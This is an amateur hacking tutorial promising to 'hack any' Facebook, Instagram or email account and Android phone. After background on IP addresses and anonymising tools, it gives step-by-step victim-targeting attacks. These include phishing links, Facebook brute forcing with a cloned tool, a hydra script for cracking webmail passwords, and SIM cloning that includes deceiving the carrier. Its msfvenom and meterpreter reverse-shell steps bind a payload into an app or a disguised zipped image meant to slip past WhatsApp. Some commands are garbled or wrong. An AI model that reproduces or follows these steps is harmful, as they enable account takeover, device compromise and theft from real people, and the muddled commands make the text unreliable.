Social media hacking: hack any facebook,instagram,twitter,
accounts.. Hello and welcome to this social media hacking in this book we will
how to hack facebook,instagram,twitter and smartphones by sending an image
with various methods. All this methods of hacking account and smartphone are
just for educational purpose if you miss use this hacking skills then we are not
responsible for this
Chapters-
(1)- Understanding the concept of ip (2)- Changing ip address (3) - Phishing
attack (4)- Brute force attack (5) - SIM cloning (6)- Password resetting (7)-
Creating trojan virus to hack android (8)- Binding virus in an image to hack
android So these are the chapters we are going to read in this book Understanding ip address
Q1-what is an ip? Type of ip.
Internet protocol:- The Internet Protocol (IP) is the principal communications
protocol in the Internet protocol suite for relaying datagrams across network
boundaries. Its routing function enables internetworking, and essentially
establishes the Internet.
IP has the task of delivering packets from the source host to the destination host
solely based on the IP addresses in the packet headers. For this purpose, IP
defines packet structures that encapsulate the data to be delivered. It also defines
addressing methods that are used to label the datagram with source and
destination information.
Types of ip--
There are four types of ip address
. Local ip
. Public ip
. Dynamic ip
. Static ip
. Local ip - An external or public ip address is used across the
entire Internet to locate computer systems and devices. A local or
internal ip address is used inside a private network to locate the
computers and devices connected to it is known as local ip.
. public IP address – a public ip address that can be accessed
over the Internet. Like postal addresses to deliver a postal mail to
your home, a public ip address the globally unique ip address
assigned to a computing device. Your public ip address can be
found at What is my ip Address page .
Dynamic ip- A dynamic IP address is an IP address that's automatically assigned
to each connectionof a network, like your smartphone, desktop PC, wireless
tablet... whatever.
This automatic assignment of IP addresses is done by what's called
a DHCP server A DHCP server assigned IP address is called dynamic because it
will often be different on future connections to the network.
The "opposite" of a dynamic IP address is called a static IP address (one that was
configured manually).
Static ip - A static IP address is an IP address that was manually configured for a
device, versus one that was assigned via a DHCP server. It's called static because
it doesn't change. It's the exact opposite of a dynamic IP address, which change.
Routers, phones, tablets, desktops, laptops, and any other device that can use an
IP address can be configured to have a static IP address. This might be done
through the device giving out IP addresses (like the router) or by manually
typing the IP address into the device voice the device itself.
Static IP addresses are also sometimes referred to as fixed ip address dedicated
ip address.
Why Would You Use a Static IP Address?
Another way to think of a static IP address is to think of something like an email
address, or a physical home address. These addresses don't ever change - they're
static - and it makes contacting or finding someone very easy.
Similarly, a static IP address is useful if you host a website from home, have a
file server in your network, are using networked printers, are forwarding ports to
a specific device, are running a print server, or if you use a remote access
program. Because a static IP address never changes, other devices always know
exactly how to contact a device that uses one.
For example, say you set up a static IP address for one of the computers in your
home network. Once the computer has a specific address tied to it, you can set
up your router to always forward certain inbound requests directly to that
computer, such as FTP requests if the computer shares files over FTP.
Not using a static IP address (using a dynamic IP that does change) would
become a hassle if you're hosting a website, for example, because with every
new IP address that the computer gets, you'd have to change the router settings
to forward requests to that new address. Neglecting to do this would mean
nobody could get to your website because your router has no idea which device
in your network is the one that's serving the website.
Another example of a static IP address at work is with DNS servers. DNS
servers use static IP addresses so that your device always knows how to connect
to them. If they changed often, you'd have to regularly reconfigure those DNS
servers on your router or computer to keep using the internet like you're used to.
Static IP addresses are also useful for when the device's domain name is
inaccessible. Computers that connect to a file server in a workplace's network,
for instance, could be set up to always connect to the server using the server's
static IP instead of its hostname. Even if the DNS server is malfunctioning, the
computers could still access the file server because they'd be communicating
with it directly through the IP address.
With remote access applications like Windows Remote Desktop, using a static
IP address means you can always access that computer with the same address.
Using an IP address that changes will, again, require you to always know what it
changes to so that you can use that new address for the remote connection.
Static vs Dynamic IP Addresses
The opposite of a never-changing static IP address is an ever -changing dynamic
IP address. A dynamic IP address is just a regular address like a static IP is, but
it's not permanently tied to any particular device. Instead, they're used for a
specific amount of time and then returned to an address pool so that other
devices can use them.
This is one reason that dynamic IP addresses are so useful. If an isp were to use
static IP addresses for all of their customers, that would mean that there'd
constantly be a limited supply of addresses for new customers. Dynamic
addresses provide a way for IP addresses to be reused when they're not in use
elsewhere, providing internet access for many more devices than what would
otherwise be possible.
Is Your Inbox Out of Control?
Believe it or not, our free, daily newsletter can help you use tech better and
declutter your inbox. Sign up now!
https://www.lifewire.com/bWFpbHRvOnRlY2h0b2RheUBsaWZld2lyZS5jb20/c3ViamVjdD1TaWduIG1lIHVwIGZvciBUZWNoIFRvZGF5IQ==
Static IP addresses limit downtime. When dynamic addresses obtain a new IP
address, any user that's connected to the existing one will be kicked off from the
connection and have to wait to find the new address. This wouldn't be a wise
setup to have if the server is hosting a website, a file sharing service, or an online
video game, all of which normally require constantly active connections.
The public IP address assigned to the routers of most home and business users is
a dynamic IP address. Larger companies usually do not connect to the internet
via dynamic IP addresses; instead, they have static IP addresses assigned to them
which do not change.
Disadvantages of Using a Static IP Address
The major disadvantage that static IP addresses have over dynamic addresses is
that you have to configure the devices manually. The examples given above with
regards to a home web server and remote access programs require you not only
to set up the device with an IP address but also to properly configure the router
to communicate with that specific address.
This definitely requires more work than just plugging in a router and allowing it
to give out dynamic IP addresses via DHCP.
What's more is that if you assign your device with an IP address of, say,
192.168.1.110, but then you go to a different network that only gives out
10.X.X.X addresses, you will not be able to connect with your static IP and will
instead have to reconfigure your device to use DHCP (or pick a static IP that
works with that new network).
Security might be another downfall to using static IP addresses. An address that
never changes gives hackers a prolonged time frame to find vulnerabilities in the
device's network. The alternative would be using a dynamic IP address that
changes and would, therefore, require the attacker to also change how it is
communicating with the device.
How to Set a Static IP Address in Windows
The steps for configuring a static IP address in Windows are fairly similar
in Windows 10through Windows XP. See this guide at How-To Geek for
specific instructions in each version of Windows
Some routers let you reserve an IP address for specific devices that are
connected to your network. This is normally done through what's called DHCP
reservation and it works by associating an IP address with a MAC address so
that each time that specific device requests an IP address, the router assigns it the
one you've chosen to have associated with that physical MAC address.
You can read more about using DHCP Reservation at your router's
manufacturer's website. Here are links to instructions on doing this on DLink, Linksys, and NETGEARrouters.
Fake a Static IP With a Dynamic DNS Service
Using a static IP address for your home network is going to cost more than just
getting a regular dynamic IP address. Instead of paying for a static address, you
could use what's called a dynamic dns service.
Dynamic DNS services let you associate your changing, dynamic IP address to a
hostname that don’t change. It's a bit like having your own static IP address but
at no extra cost than what you're paying for your dynamic IP.
No ip is one example of a free dynamic DNS service. You just download their
DNS update client which always redirects the hostname you choose to be
associated with your current IP address. This means if you have a dynamic IP
address, you can still access your network using the same hostname.
A dynamic DNS service is very helpful if you need to access your home network
with a remote access program but don't want to pay for a static IP address.
Similarly, you can host your own website from home and use dynamic DNS to
ensure your visitors always have access to your website.
ChangeIP.com and DNSdynamic are two more free dynamic DNS services but
there are many others.
More Information on Static IP Addresses
In a local network, like in your home or place of business, where you use
a private IP address, most devices are probably configured for DHCP and thus
use dynamic IP addresses.
However, if DHCP is not enabled and you've configured your own network
information, you're using a static IP address.
Changing ip address
Changing ip address-
= changing the ip of an operating system is very important for hackers and for
normal public also because the people should not be allowed to remain
anonymously on the web. I don’t like that site need to track how much hours i
spend watching YouTube videos or how i do my online banking, especially with
every company crumbling under the fingers of information So there are three
methods of changing the ip address and be anonymous.
(1) Proxy chain (2) Tor browser (3) Vpn (virtual private network)
(1) Proxy chain Proxy chain is a tool allow you to chain multi
proxy to connect to each other and then wrep your program of
choice the connect to the Internet this masks your ip with many
layers and can be a good tool when you are trying to be anonymous
by the help of proxy chain we can select any country ip address by
our choice.
Steps to change ip with proxy chain tools.
Step1—first download the proxy chain tool by typing the
urn in url box https://googleweblight.com/i?
u=proxychains.sourceforge.net/&hl=en-IN&tg=161 or
directly type on google download proxy chain too
googleweblight you will get.
Step2—And install this tool and open terminal Step3
—type command sudotor -zxvf Now
change the directories and configure Step4—Type cd
&& ./configure Step5—then type
sudo make Step6—Install the proxy chain command Sudo
make install Now this time to watch a video go to
youtube.com and type proxy chain configuration select the
video with same title and watch it.
Commands
1. Nano proxychain.conf
2. Add proxies to the confirmation files
3. Proxy chain curl -s https://checkips.dyndns.org
To run Firefox through it, run.
Proxy chainFirefox – That will wrap around Firefox
connection and run it through the chain if you ip address has
changed congratulations!
Tor browser -
= Tor browser is a software protect you by bouncing you communication around
a distribution network of relays run by volunteer all around the world. This
software is available in every platform like android,iso, Windows and Linux and
many more and by the help of this software we can make our self more
anonymous. All the attack of hacking are performed by kali Linux so we need to
learn how to install the tor browser in kali linux. Just follow the given steps to
install in kali linux os
Step1—open the browser of you kali Linux os
Step2—go
to google.com and type tor browser for kali Linux and download from its official
website but remember download the application according to your os bit.
Step3—now your file is in zip format the extract it
step4—Open that folder and
there you will see a text file name start tor browser open that and type ctrl +f to
find so type root on the file search box.
Step5—There you will see a script written as “id-u “ -eq=0 so just edit the text
just change 0 into 1 and save it.
step6—Now cut every folder and go to desktop and open a terminal and type cd
desktop if your tor browser file is in the desktop otherwise go to that folder
where your tor browser installation file is and type command cd the tor browser
file installation name.
Step7-You will enter on that file directory so just need to type cd that copy the
open tor browser file name and past into the terminal after writing cd and press
enter installation will start automatically.
Browse the Internet without any tension about tracking because the tor browser
change you ip after some time so it is very difficult to find your current location.
Vpn (virtual private network ) - Vpn standards for virtual private network it is a
secure tunnel between two or more devices .vpn are used to protect private web
traffic from snooping interference. A vpn available from the public Internet can
provide some of the benefits of wide area network. So today we will learn how
to use vpn in kali Linux and more secure and safe.
Steps to connect the open vpn settings Step1—go to desktop and open a
terminal and type all this commands Sudo apt-get install network.
Manager-openvpn networkmanager Networkmanager-gnome network
Manager-openvpn-gnome After typing all this command all the settings will
open to connect the vpn. Then update the network manager config file.open in
vim just type command.
Vi/etc/networkmanagement/networkmanager.conf Press i and install a mode.
Then arrow down to the line that says.
[Main]
Plugins=ifupdown,keyfile [Ifupdown]
Managed=true
After then reboot you pc and after rebooting go to desktop and open terminal and
type these commands = Mkdir -/openvpn.
Then Cd into that directory.
= Cd -/openvpn Then run this command = wget
https://www.privateinternetaccess.com/openvpn/openvpn.zip
Then download from given link the file will be in zip format the extract it.
Open Settings, then go to Network. Once in network:
1. click + at the bottom left to add a new connection.
2. Choose VPN.
3. Click import from file.
4. Go to the openvpn folder we made earlier.
5. Double click on the connection you want, (us-east, mexico, toronto,
etc)
6. Remove :1198 from the end of the gateway field, should just end
with .com
7. Put in your PIA username and password
8. Click Advanced
9. Check Use custom gateway port and set it to 1198
10. Click the security tab at the top
11. Scroll down until you see AES-1286-CBC and check that one, do not
use the lower case aes-128-cbc if you see it.
12. Change the HMAC Authentication to SHA-1
13. Click OK
14. Click Apply
15. Choose your new VPN from that list and click the On/Off switch and watch it connect.
Phishing attack
Q 1-what is phishing attack? = phishing attack is a type of social engendering
in which the hacker make a fake page like real one and send to victim and ask to
log in when the victim log in into it. The hack get the id number and password of
user this attack can be perform in any type of account which needs id and
password to log in. Generally this attack is performed for facebook hacking. But
nowadays facebooks blocking the phishing link by this phishing attack is bit
controlled.
Q2 How to hack fb by using phishing attack.
To hack Facebooks by phishing attack just follow the given steps bellow.
(1) open you browser (2) go to google.com and search shadowaves (3) Select
the top of the result and open that site (4) first create your account and log in (5)
at the home page you will see two options (1) samers1 (2) scammers select the
second option (scamers2) (6) copy the link and send to your victims in massage
or in a zip file because if we send it directly facebook will block that link and
your id also.
(7) And ask to log in when he or she log in into it you will get the number and
password ( Simple) Brute force attack
To hack facebook account by using brute force attack just follow the given steps.
Step 1 – getting ready To perform this attack you need to download a script of
Faitagram just open the terminal and type cd desktop and press enter the type
git clone https://github.com/Juniorn1003/Faitagram.git/ and press enter file
will download on your desktop.
License is just a MIT license, Readme has informations about the script on
it, faitagram is the main source, setup.py is for the installing dependencies,
and wlistis a wordlist so lets chrom the file so we can access it.
Step 2-After downloading the file go to the faitagram directory by just typing
cd Faitagram after entering in the folder type “chmod +x faitagram &&
chmod +x setup.py’’
We did that’ to install all the requirements to run the script by typing a
command “python setup.py’’
It will install all the packages that to start a brute force attack you just need to
wait for some times after completing the installation you no need to download
the world list because The faitagram file contains a strong password list, so
don't worry about the wordlists. But still if you want to test it out, than use
your own wordlist.
The format is: “python faitagram -s service -u username -w wordlist -d delay’’
Now all things are ready and you can start bruteforce attack for facebook just
type – “python faitagram -s facebook -u (email) -w (wordlist) -d (delay)’’
The (email) section, is for the email of your target.
The (wordlist) section is for the path to the wordlist.
And the (delay) is for the delays(seconds).
Delay is optional, just don't type the "-d" if you don't want to use it.
But, the others are a must.
And if you don’t have a world list and you want to select the defolt wordlist
then just type "wlist" instead of the (wordlist).
Some times in FaceBook, it will ask you to enter the name of the target.
It is just to prevent errors, and for Username Checking.
Example – “python -s facebook -u MEMEBIGBOY -w rootpassword.txt’’
Wait it can take some times depending upon your target password strength
Email hacking with bruteforce As we know that email is required everywhere
and if we hack the email of the victim then we can do any thing what every we
want so today we are going to learn how to hack email anonymously by the
help of brute force attack just follow the given steps so you can also perform
this attack very easily.
So now we will be focusing on brute forcing email, or more specifically,
SMTP, also known as the Simple Mail Transfer Protocol. It is your standard
protocol for sending electronic mail to the peoples.
Requirments-updated kali linux operating system Good fast internet connection
Your system ip should be chanded and use good vpn.
Step1-Let's open Leafpad, or your text editing program of your choice
Step2- Bash time We are going to write a little bit of script, so that we can
save some time instead of going through the hassle of actually typing out
parameters.
On Leafpad, type:
#! binbash echo Simple Email Cracking Script in bash
echo Written By: Alan Cao
echo NOTE: Make sure you have wordlists!
echo Let us Begin:
echo Choose a SMTP service: Gmail = smtp.gmail.com Yahoo = smtp.mail.yahoo.com Hotmail =
smtp.live.com /:
read smtp
echo Enter Email Address:
read email
echo Provide Directory of Wordlist for Passwords:
read wordlist hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp And after doing this all just,
save it as anything you want, but with .sh at the end. Make sure it is in the root directory. Not on your
desktop, but in /root. ( must important)
#! binbash simply means that everything is in bash
echo simply means to tell the computer to say something.
read is asking for user input. this will then store your input into a variable. read email would mean for
you to enter something, and it will be stored into the email.
hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp is the THC Hydra command which will help
bruteforce the email address. As you may tell, there are some parameters with a $. This is the variable
with stored values you previously input in the read command.
Step3- permission The file you have saved (in root, right?) only has read and write permissions.
This means you cannot execute it. So just follow this step to execute open up Terminal. Type in
chmod a+x yourscript.sh (ofc replace yourscript with the name you actually gave to the bash file)
Step4-Execute!
Now we can finally use it!
In terminal,type
./yourscript.sh
It's working!
./emailcrack.sh
The script is self-explanatory. Type in the SMTP service of the target's email, where smtp.gmail.com is
Gmail. After that, you just provide the gmail account,example johndoe@gmail.com and give a wordlist
directory, which you can find some default ones in the usrshare/wordlists directory, or you can create
your own with Crunch or CUPP. It is better to create a own wordlist but basically it is depend on your
victim.
Sim cloning
Q1-what is sim cloning ?
- sim cloning is the method by that we can clone sim card after
cloning the the calls,messages will come on both the sims same
we can do same work both the clone sims but there are the
some terms and conditions to clone a sim
1- we cannot
clone any sim card there are 3 types of sim in market based on
three algoritham COMP128v1, COMP128v2 and
COMP128v3 it is very imoprtent to note that only version
comp128v1 sim card can clone but 70 % of the sim card we use
are in comp128v1 sim card.
Things required to clone a sim Blank Programmable SIM Card: I got this one
from Amazon, you can also buy one from alibaba A SIM Firmware
Reader/Writer: I also got this on Amazon, but it’s available on alibaba
Download and install: MagicSIM
Download and install: USB SIM Card Reader
Access to the victim’s SIM for about 15 to 20 minutes ??
Steps to clone a sim.
Step1-remove the sim from the phone that you want to clone and instert into sim
card reader click read from the card in magic SIM.
Select crack sim in toolbar when it show “connected’’
Step2-Click strong KI and select all of the other find options and then click start.
Once your KI is found and the crack is finished, click the file, save the file info
into a folder Step3-You must click disconnect from the file menu or you will
ruin your SIM card[Important, Otherwise SIM will crack]
Step4—Once it says disconnected. Remove the SIM card and Put the SIM in
your phone and see if it still works, it should. (If not, either you did not unlock
your SIM card, or you tried to copy it instead of crack and save retry again)
Unlock SIM Card
GO TO PHONE TOOLS AND SELECT SIM CARD, THEN SELECT
UNLOCK SIM, IT WILL PROMPT FOR A CODE.
CALL NETWORK PROVIDER, THEY WILL ASK FOR YOUR PHONE
NUMBER, YOUR ACCOUNT INFO, NAME, AND SECURITY CODE,
THEN THEY WILL ASK WHY YOU WANT TO UNLOCK YOUR SIM
CARD, JUST TELL THEM YOU NEED TO UNLOCK YOUR SIM TO GET
IT TO WORK WITH YOUR OVERSEAS PHONE OR SOMETHING THEY
WILL DO. ONECE THEY GIVE YOU SIM UNLOCK CODE ENTER IT, IT
WILL SAY SIM IS UNLOCKED STEP5-INSERT THE BLANK SIM CARD
AND OPEN USB SIM Card Reader Software not magic SIM at this time.
Step6-click on the connect it will say no information is formed if it is truly blank
sim card Step 7: Select the write to SIM, it will prompt you to select a .dat file,
select the one you saved earlier
Step 8: Now click on the start, it will take about 10 minutes to write it, once it is
complete, it will ask for a security code, enter the security code the network
provider gave you, then click Finish sim will cloned.
DONE: You have successfully cloned a SIM Card.
Resetting password
now you had cloned the sim card so now you can easily rest the password but
now we will learn how to access the victim phone without touching his or her
phone by just sending an image.
Creating virus to hack android
Creating a virus and hacking android is the basic to android
hacking so today we will learn how to create a virus and hack
android so before creating virus change your ip and use vpn to
download any file. There are many methods to hack android like
creating Trojan viruses,payload and many more so today we will
learn to create a payload and injecting into an application just
follow the given steps or watch a YouTube video just type on the
youtube url box backdoreapk android hacking binding payload with
an application select the top results and watch it.
Steps:-
Step1—go to desktop and open your browser Step2—download any
android application less then 10 mb to bind paylaod in apk.
Step3—Now go to google.com and type backdore.apk git hub and open
the top result.
Step4- Copy the link of that application by clicking on clone and
download
Step5—Go to desktop and type command cd desktop to
change the directory on desktop Step6—Type git clone and past the link
that you had copied and press enter that app will download in your
desktop Example to write command—
git clone
https://github.com/dana.at.cp/backdore.apk.get
Step6—Open that folder and there you will see a folder name
backdore.apk open that folder
Step7—Copy your Android apk and past
into backdore.apk file.
Step8—Now cut that folder and go to desktop and open a new terminal.
Step9—Type cd Desktop type to enter in the desktop and open a new
terminal.
step10—Type ls to see all the files in the current directory.
Step11—Then type cd backdore.apk and press enter.
Step12—Then you will enter on backdore.apk folder directory type ls
and press enter.
Step13—Then type cd backdore.apk and press enter then type is to see
the file of the backdore.apk
Step14—Type command chmod +×
backdore.apk.sh and press enter
Step15—Type ./backdoreapk.sh then
type your Android apk file name and press enter.
Step16—Type 3 (meterpreter/reverce_tcp) it will ask you lhost
Step17
—Open a new terminal and type ipconfig to see your ip copy it.
Step18—past your ip to the lhost and press enter and remember that you
ip should be static to perform this attack in (wan)
Step19—now it will
ask your port no type your port number but your port should be
forwarded then only it work if you don’t know how to port forward
don’t worry just go to YouTube and type how to port forward of router
just watch any video and forward your port no.
Step20—Now you will see lots of option but you just type 2 and press
enter.
Step21—Open the backdore apk file and and go to backdore file again
and open terminal through it.
Step22- Type service apache2 start
Step23—Then type service
postgresql start.
Step24—Then type msfconsole
Step25—Then type multi/handler
Step26—Then type set payload android/meterpreter reverse_tcp
Step27—set lhost type your static ip
Step28—set lport port no which is
forward
Step29-exploit
Send that apk file to your victims and ask to install when he will open
that app you will get all the control of his phone after installing and
opening the app
Step30—type help to see what-what you can do.
Bind virus into an image (Android hacking)
We had learned all ready what is virus and how to bind virus with an android
application but today we will learn how to bind virus into an image so by
sending an image we can hack any android phone but we should have to send
that image into a folder and folder should be zip just follow the given steps.-
Step1—Go to desktop and a new terminal.
Step2—Type a command= msfvenum -p android/meterpreter/reverce_tcp Lhost
(type your static ip)Lport (your port number which is forwarded) -f exe -o
rootdesktop/lol.exe Now your image is generated in desktop so copy that fine
and past it into a windows operating system desktop page.
Step3—Now bind the virus and image together but before binding make sure
that your image revelation should be low
Step4—select the both and click right
button and go to add to archive
Step5—Then rename the file name.
Step6—Then go to compression mode and select best
Step7—the go to advance
settings the again go to setup settings and type the both file name.
Step8—Then go to modes and select hide and then go to text and icon option
and choice your file in sfx icon.
Step9—Then select the overwrite of file option on overwrite mode.
Step10—Then press ok on both the options your image will created on desktop
then send it to your victims but your file should be in zip so the what’s app
cannot detect it.
Step11—Now go to kali Linux desktop and open the terminal and where you
left up type command multi/handler
Step12—Then type set
payload/meterpreter/reverce_tcp
Step13—Then type set lhost ( then your static
ip)
Step14—Then type lport (your port no which is forward)
Step15—Type
exploit When your victims open that image after extracting your will get the
meterpreter then you can do every thing what ever you want just type help to see.
Comments